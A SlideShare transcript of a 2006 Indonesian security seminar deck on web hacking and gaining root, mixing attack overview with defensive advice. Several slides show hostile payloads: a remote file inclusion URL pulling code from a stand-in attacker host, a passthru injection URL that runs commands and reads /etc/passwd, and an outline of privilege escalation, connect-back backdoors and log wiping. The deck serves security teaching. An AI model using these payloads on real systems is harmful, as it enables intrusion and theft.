from 33 to 0 - A journey to be root

1,405
-1

Published on

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,405
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
54
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

from 33 to 0 - A journey to be root

  1. 1. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K http://www.google.com/search?q=y3dips
  2. 2. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] theory how 2 start , lookin for foods , we “ drive in “ , what we choose, web hacking survive user, developer, administrator simulation from 33 to 0 discussion
  3. 3. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] do we know hacking ? hacker != cracker hacking is not defacing f.a.q 4 newbies version 1.0 at (http://ezine.echo.or.id/ezine8/ez-r08-y3dips-faqfn.txt)
  4. 4. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] footprinting , scanning , enumeration need to find a low security machine lazy admin un-patch default are fault more n more ….. pe-de-ka-te with target
  5. 5. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] from open port 80 are open, 22 are open, 25 are open, … operating system vulnerability windows xp sp 1, redhat 8.0 remote ? application bug authentication attack (bruteforcing, password guessing) passive action (sniffing) social engineering
  6. 6. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] well known services are open ? ssh, smtp, https, pop3 …. also open web server are open should we do web hacking
  7. 7. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] hacking over http hacking against web application web browser attack using http rules (method)
  8. 8. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] on the top of the layer most of server in i-net running web server how about Firewall ? it’s a legal request un-filtered ? dynamically changed run multiple application (voting, guestbook, e.t.c) more friendly >< more easier
  9. 9. On The Top of Security Level Layer
  10. 10. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] web browser ? (opera, firefox) command line interface (msdos, bash) programming language reference : advisories
  11. 11. •Apache •IIS Plugins •Tomcat •Perl •Netscape •PHP http request •JSP (clear text/ ssl) •E.t.c Web application Http reply User (HTML, Firewall Javascript, Web Server VBscript) •MsSQL •Postgre •Mysql •Oracle Database Server
  12. 12. Client side attack (xss, cookies stealing) Information Disclosure OS commanding (SQL, SSI, Ldap, Xpath ) Brute Force Web Hacking Denial Of Service Path travesal Remote command execution (php) Etc Sumber: http://www.webappsec.org
  13. 13. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] suatu jenis serangan yang dilakukan dengan meng- include-kan halaman web lain kepada suatu situs/web aplikasi. index.php ( bug in $file variable) http://victim.com/index.php?file=readme.txt http://victim.com/index.php?file=http://echo.or.id
  14. 14. http://advisories.echo.or.id/adv/adv33-K-159-2006.txt
  15. 15. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] victim http://echo.or.id
  16. 16. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] <? phpinfo();?> Change url “http://echo.or.id’ > http://attacker.xxx/in.txt Real site
  17. 17. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang “vulnerable” akan mengeksekusi “request” yang di kirimkan. viewtopic.php ( bug at highlight variable) http://victim.com/viewtopic.php?t=48 http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru ($HTTP_GET_VARS[a]).%2527&a=id;pwd;cat /etc/passwd
  18. 18. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
  19. 19. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] defacing private data stolen system compromise zombie ( ddos agent, botnet agent ) e.t.c
  20. 20. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (folder lain ; file lain)
  21. 21. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ]
  22. 22. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  23. 23. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] always update ur system use a firewall, antivirus, good backup facility, etc using good password/pass phrase be carefull of social engineering carefully in using public facility ( cyber cafe ) secure login/Secure connection (https ; ssh) update an information
  24. 24. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] secure programming input validation encryption in authentication set error log to off what u need? and what u can? update an information
  25. 25. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] policy (strict restriction) optimal setting on server function restriction php (passthru , system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver); mysql (system). update the system (security pacth/update) update an information
  26. 26. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  27. 27. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] pe-de-ka-te web hacking process php injection, enumeration escalating priveledge ptrace-kmod backdooring bindtty, connect-back cleaning our footprints remove.c
  28. 28. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] Ahmad Muammar W. K.
  29. 29. ECHO RESEARCH AND DEVELOPMENT CENTER :: http://echo.or.id :: seminar network security and hacking [ batam, 22 juli 2006 ] http://kaos.echo.or.id

×